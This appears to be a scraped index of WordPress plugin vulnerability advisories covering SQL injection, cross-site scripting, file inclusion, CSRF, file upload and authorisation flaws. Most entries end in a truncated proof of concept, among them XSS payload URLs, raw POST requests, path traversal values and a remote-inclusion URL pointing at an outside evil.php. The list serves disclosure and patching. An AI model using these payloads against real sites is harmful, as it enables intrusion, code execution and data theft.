WP Review Slider < 12.2 - Subscriber+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. Run the following code in the browser console on any WP Admin page. fetch'/wp-admin/admin-ajax.php', method: 'POST',...
WP Reactions Lite < 1.3.6 - Authenticated Stored Cross Site Scripting
The plugin does not properly sanitize inputs within wp-admin pages, allowing users with sufficient access to inject XSS payloads within /wp-admin/ pages. Open Global Activation and click on Customize Now. On Step 3, Styling tab, enter the XSS payload into the "What's your reaction" field. Payload used:...
Stop Spammers Security < 2021.18 - Authenticated Stored XSS
The plugin does not escape some of its settings, allowing high privilege users such as admins to set Cross-Site Scripting payloads in them even when the unfiltered_html capability is disallowed. Put the following payload in any of the API fields of the Web Services settings: " autofocus...
JH 404 Logger <= 1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
The plugin doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. curl 'https://example.com/non-existing-page"' -e '"'...
GeoDirectory < 2.2.24 - Admin+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin-ajax.php HTTP/1.1...
Weather Effect < 1.3.6 - Admin+ Stored Cross-Site Scripting
The plugin does not properly validate and escape some of its settings, like sizeleaf, flakesleaf and speed, which could lead to Stored Cross-Site Scripting issues. POST /wp-admin/admin.php?page=weather-effects-setting HTTP/1.1 Accept: text/html, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding...
Docket Cache < 21.08.02 - Reflected Cross-Site Scripting
The plugin does not escape some filter parameters when the OPCache Viewer is enabled before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues. https://example.com/wp-admin/admin.php?page=docket-cache-opcviewer&idx=opcviewer&s=a&sf="alert/XSS-sf/&sm="alert/XSS-sm/...
Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)
The plugin did not sanitise or escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue. alert/XSS/"' /...
WordPress Download Manager < 3.1.18 - Unauthorised Download Duplication
The duplicate method, hooked to the admin_init action, did not have any CSRF or authorisation checks, allowing unauthorised users, including unauthenticated ones, to duplicate arbitrary downloads. As an unauthenticated or authenticated user, open the following URL to duplicate the Download with id 717...
Blog2Social < 6.9.10 - Subscriber+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated user, such as a subscriber. Run the script below in the web browser console while logged in as a subscriber and on the Blog2Social...
Print-O-Matic < 2.0.3 - Admin+ Stored Cross-Site Scripting
The plugin does not escape some of its settings before outputting them in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Pause Before Print" setting of the plugin: ...
WP Header Images < 2.0.1 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the t parameter before outputting it back in the plugin's settings page, leading to a Reflected Cross-Site Scripting issue. https://example.com/wp-admin/options-general.php?page=wphi&t=5"alert/XSS/...
Sociable <= 4.3.4.1 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise or escape some of its settings before outputting them in the admin dashboard, allowing high privilege users to perform Cross-Site Scripting attacks against other users even when the unfiltered_html capability is disallowed. Put the following payload in the "Background...
YITH WooCommerce Product Add-Ons < 2.1.0 - Authenticated Local File Inclusion
The plugin does not validate user input before using it to generate a local path passed to include, which could lead to a Local File Inclusion issue on Windows web servers. https://example.com/wp-admin/admin.php?page=yithwapopanel&tab=blocks&blockid=1&addonid=1&addontype=html%2F..%2Fhello...
Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue which will be executed in the context of a logged-in administrator...
Insert Pages < 3.7.0 - Contributor+ Stored Cross-Site Scripting
The plugin adds a shortcode that prints out other pages' content and custom fields. It can be used by users with a role as low as Contributor to perform Cross-Site Scripting attacks by storing the payload/s in another post's custom fields. - Create a page A - Add a custom field containing JS in...
Storefront Footer Text <= 1.0.1 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitize and escape the "Footer Credit Text" added to pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. The plugin requires the Storefront theme. Go to Appearance, Customize, /wp-admin/customize.ph...
YITH WooCommerce Product Add-Ons < 2.1.0 - Reflected Cross-Site Scripting
The plugin does not escape some parameters before outputting them back in the edit addon page in the admin dashboard, leading to Reflected Cross-Site Scripting issues. v alert/XSS-id/&addontype=html"alert/XSS-type/ v 2.1.0...
UsersWP < 1.2.2.29 - Reflected Cross-Site Scripting
The plugin sanitises user input via sanitize_text_field but does not escape it before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues. On the reset page made by the plugin: https://example.com/reset/?key=a&login=%22accesskey=X%20onclick=alert1%20b=%22...
WP Customer Reviews < 3.5.6 - Authenticated Stored Cross-Site Scripting (XSS)
The plugin did not sanitise some of its settings, allowing high privilege users such as administrators to set XSS payloads in them, which will then be triggered in pages where reviews are enabled. 1. Login to WordPress as an Administrator 2. Install and Activate plugin "WP Customer Reviews" 3. Clic...
Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)
Unvalidated input and lack of output encoding within the plugin lead to a Reflected Cross-Site Scripting (XSS) vulnerability in the 'lang' GET parameter while editing a post, triggered when users with the capability to edit posts access a malicious URL...
Constant Contact Forms < 1.8.8 - Multiple Authenticated Stored XSS
Multiple stored cross-site scripting vulnerabilities in Constant Contact Forms for WordPress 1.8.7 and lower allow high-privileged users (Editor+) to inject arbitrary JavaScript code or HTML in posts where the malicious form is embedded. A high-privileged user (Editor+) can exploit the XSS via Add New Form's...
Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure
The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customers' data. Make a booking to get a customer account. Login via the API and get an access token: curl...
WP Coder < 2.5.2 - RFI leading to RCE via CSRF
The plugin, within the wow-company admin menu page, allows including arbitrary files with a PHP extension as well as via the data:// or http:// protocols, thus leading to RCE via CSRF. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Events Made Easy < 2.2.24 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape Custom Field Names, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Add/Edit a Custom Field at /wp-admin/admin.php?page=eme-formfields and put the following payload in the Field Name:...
StreamCast < 2.1.1 - Contributor+ Stored Cross-Site Scripting
The plugin does not sanitise or validate the parameters of its shortcode, allowing users with a role as low as contributor to set a Cross-Site Scripting payload in them, which will be triggered in the page/s embedding the malicious shortcode. Log in as contributor and add the following shortcode i...
Affiliate Power < 2.3.0 - Reflected Cross-Site Scripting
The plugin does not escape the page parameter in its Affiliate Power Sales dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue. alert/XSS/' /...
Easy Accordion < 2.0.22 - Authenticated Stored XSS
The plugin does not properly sanitize inputs when adding new items to an accordion. When adding new items, an injection payload of "" for an accordion item's title results in XSS in the wp-admin page as well as on pages that show the accordion...
Tutor LMS < 1.9.6 - Reflected Cross-Site Scripting
The plugin does not escape a page parameter before outputting it back in a student dashboard page, leading to a Reflected Cross-Site Scripting issue. alert/XSS/' /...
Business Directory Plugin < 5.11 - Arbitrary File Upload to RCE
The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged-in administrator import files. As the plugin also did not validate uploaded files, it could lead to RCE. Note from the WPScan Team: a CSRF check and some file validation were added in v5.11, however a blacklist...
User Registration < 2.2.4.1 - Subscriber+ Arbitrary File Upload
The plugin does not properly restrict the files that can be uploaded via an AJAX action available to both unauthenticated and authenticated users, which could allow unauthenticated users to upload PHP files, for example. The following Python script automates the exploitation of this plugin by uploading ...
Form Builder CP < 1.2.32 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of its form settings, which could allow high privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in a multisite setup. Create/edit a form and put the following...
Simple Download Monitor < 3.9.5 - Contributor+ Stored Cross-Site Scripting via File Thumbnail
The plugin does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Given that the XSS is triggered even when the Download is in a review state, a contributor could ma...
Game Server Status <= 1.0 - Admin+ Stored Cross-Site Scripting
The plugin does not escape some of the Game Server data, which could allow high privilege users such as admins to perform Cross-Site Scripting even when the unfiltered_html capability is disallowed. Create/Edit a Game Server and add the following payload as Server name: Test"alert/XSS/...
Live Scores for SportsPress < 1.9.1 - Authenticated Local File Inclusion
The plugin does not validate or sanitise the tab parameter in the admin dashboard before using it in an include statement, leading to an Authenticated Local File Inclusion. https://example.com/wp-admin/admin.php?page=live-scores-for-sportspress&tab=../../index This will include the homepage of the...
Qyrr < 0.7 - Authenticated (contributor+) Stored XSS
The plugin does not escape the data URI of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the datauritometa AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role ...
Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS
Multiple cross-site scripting vulnerabilities in Testimonials Widget 3.5.1 and lower allow remote attackers to inject arbitrary JavaScript code or HTML via the following parameters: Author, Job Title, Location, Company, Email, URL. Successful exploitation of this vulnerability would allow...
Timetable and Event Schedule by MotoPress < 2.3.19 - Author+ Stored Cross-Site Scripting
The plugin does not sanitise some of its parameters, which could allow low privilege users such as authors to perform XSS attacks against frontend and backend users when viewing the related event/s. Create an event with the following payload in the description of a timeslot: The XSS will be execute...
Mapwiz <= 1.0.1 - Admin+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin.php?page=myplug/muyplg.php&mid HTTP/1.1...
Search Logger <= 0.9 - Admin+ SQLi
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users. Go to Search Logger, Logs, and select Delete...
Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal
The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download. jQuery.postajaxurl, action: "sdmremovethumbnailimage", postiddel: 613 // not owned by the user POST /wp-admin/admin-ajax.php HTTP/1.1...
Sitewide Notice WP < 2.3 - Authenticated Stored XSS
The plugin does not sanitise some of its settings before outputting them in frontend pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the Message setting of the plugin: alert/XSS/ The XS...
Database Backup for WordPress < 2.4 - Authenticated Persistent Cross-Site Scripting (XSS)
The plugin did not escape the backuprecipient POST parameter before outputting it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue. POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type:...
Sassy Social Share < 3.3.45 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Insert the...
OAuth Single Sign On - SSO (OAuth Client) < 6.24.2 - IdP Discard via CSRF
The plugin does not have CSRF checks when discarding Identity Providers (IdP), which could allow attackers to make logged-in admins delete all IdPs via a CSRF attack. Make a logged-in admin open: https://example.com/wp-admin/admin.php?page=mooauthsettings&tab=config&action=discard...
BP Better Messages < 1.9.9.41 - Multiple CSRF
The plugin does not check for CSRF in multiple of its AJAX actions: bpbettermessagesleavechat, bpbettermessagesjoinchat, bpmessagesleavethread, bpmessagesmutethread, bpmessagesunmutethread, bpbettermessagesaddusertothread, bpbettermessagesexcludeuserfromthread. This could allow attackers to make...
WP Table Builder < 1.3.10 - Reflected Cross-Site Scripting
The plugin does not escape a page parameter before outputting it back in an admin dashboard page, leading to a Reflected Cross-Site Scripting issue. alert/XSS/' /...
Gutenberg PDF Viewer Block < 1.0.1 - Contributor+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its block, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks...
POST SMTP Mailer < 2.8.8 - Authorization Bypass via type connect-app API
The plugin is vulnerable to unauthorized access and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to...
My Calendar < 3.2.18 - Subscriber+ Reflected Cross-Site Scripting
The plugin does not sanitise and escape the callback parameter of the mcpostlookup AJAX action available to any authenticated user before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue...